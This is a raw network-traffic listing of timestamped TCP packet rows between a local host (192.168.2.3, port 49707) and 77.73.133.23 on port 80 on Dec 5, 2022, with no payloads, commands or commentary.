Dec 5, 2022 01:32:59.822993040 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822993040 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.822995901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823028088 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823029041 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823057890 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823076963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823076963 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823088884 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823107004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823120117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823151112 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823157072 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823180914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823201895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823201895 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823211908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823241949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823251009 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823271036 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823271990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823302984 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823307037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823333025 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823337078 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823386908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823390961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823390961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823430061 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823451042 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823468924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823482037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823512077 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823553085 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823565960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823565960 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823592901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823632002 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823647976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823647976 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823673964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823697090 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823714972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823739052 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823757887 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823792934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823797941 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823817968 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823839903 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823879957 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823900938 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823900938 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823920965 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823962927 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.823976994 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.823976994 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824002981 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824013948 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824047089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824104071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824104071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824373960 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824414968 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824435949 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824455023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824470043 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824496984 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824537039 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824553013 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824553013 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824577093 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824585915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824619055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824657917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824673891 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824673891 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824697971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824738979 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824752092 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824752092 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824779034 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824819088 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824835062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824835062 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824858904 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824898958 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824929953 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824929953 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824942112 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824982882 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.824991941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.824991941 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825025082 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825064898 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825088978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825088978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825110912 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825165033 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825165033 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825320959 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825361013 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825402021 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825417042 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825417042 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825442076 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825481892 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825495958 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825495958 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825522900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825562954 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825578928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825578928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825603962 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825644016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825664997 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825664997 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825684071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825725079 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825741053 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825741053 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825764894 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825805902 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.825820923 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.825820923 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.826917887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.834916115 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.835052013 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.835846901 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.835890055 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.835927010 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.835939884 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.835941076 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.835963964 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836000919 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836014986 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836015940 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836040974 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836093903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836093903 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836390018 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836429119 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836466074 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836484909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836484909 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836503983 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836571932 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836585999 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836585999 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836610079 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836663961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836663961 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.836910963 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836951971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.836990118 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837023020 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837028980 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837066889 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837085962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837085962 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837104082 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837125063 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837140083 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837165117 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837166071 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837177992 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837215900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837235928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837235928 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837253094 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837275028 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837414980 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837429047 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837466955 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837502956 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837541103 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837547064 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837548018 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837578058 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837600946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837600946 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837616920 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837645054 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837702990 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.837917089 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837954998 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.837991953 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838013887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838013887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838033915 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838071108 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838088989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838088989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838109016 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838125944 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838148117 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838185072 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838215113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838215113 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838221073 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838258028 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838277102 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838277102 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838295937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838334084 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838354111 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838354111 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838371038 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838397026 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838438988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838449955 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838476896 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838514090 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838550091 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838568926 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838568926 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838587046 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838625908 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838643074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838643074 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838661909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838699102 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838716984 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838716984 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838736057 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838772058 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838788033 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838788986 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838809013 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838845015 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838860989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838860989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838902950 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838932991 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838943005 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838982105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.838995934 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.838996887 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839020967 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839056969 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839072943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839072943 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839093924 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839132071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839148045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839148045 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839194059 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839514971 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839554071 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839582920 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839592934 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839632988 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839642048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839670897 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839706898 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839725971 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839725971 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839744091 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839780092 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839797974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839797974 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839817047 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839855909 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839873075 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839873075 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839893103 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839920044 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.839931011 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.839967966 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840003967 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840022087 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840022087 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840043068 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840080023 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840101004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840101004 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840116024 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840154886 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840181112 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840181112 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840192080 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840229034 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840230942 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840250015 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840266943 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840289116 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840302944 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840338945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840359926 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840359926 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840375900 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840404034 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840415001 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840476036 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840476036 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840483904 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840522051 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840559006 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840591908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840591908 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840594053 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840615034 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840631962 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840668917 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840687037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840687037 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840707064 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.840732098 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.840836048 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851177931 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851236105 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851279020 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851320982 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851337910 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851337910 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851361990 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851418972 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851425886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851425886 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851702929 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851743937 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851773977 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851773977 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851784945 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851804972 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851828098 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851867914 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851867914 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851903915 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851908922 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851922989 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851949930 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.851984978 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.851993084 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852016926 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.852025032 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852051973 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852077961 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852103949 CET	80	49707	77.73.133.23	192.168.2.3
Dec 5, 2022 01:32:59.852108002 CET	49707	80	192.168.2.3	77.73.133.23
Dec 5, 2022 01:32:59.852108002 CET	49707	80	192.168.2.3	77.73.133.23
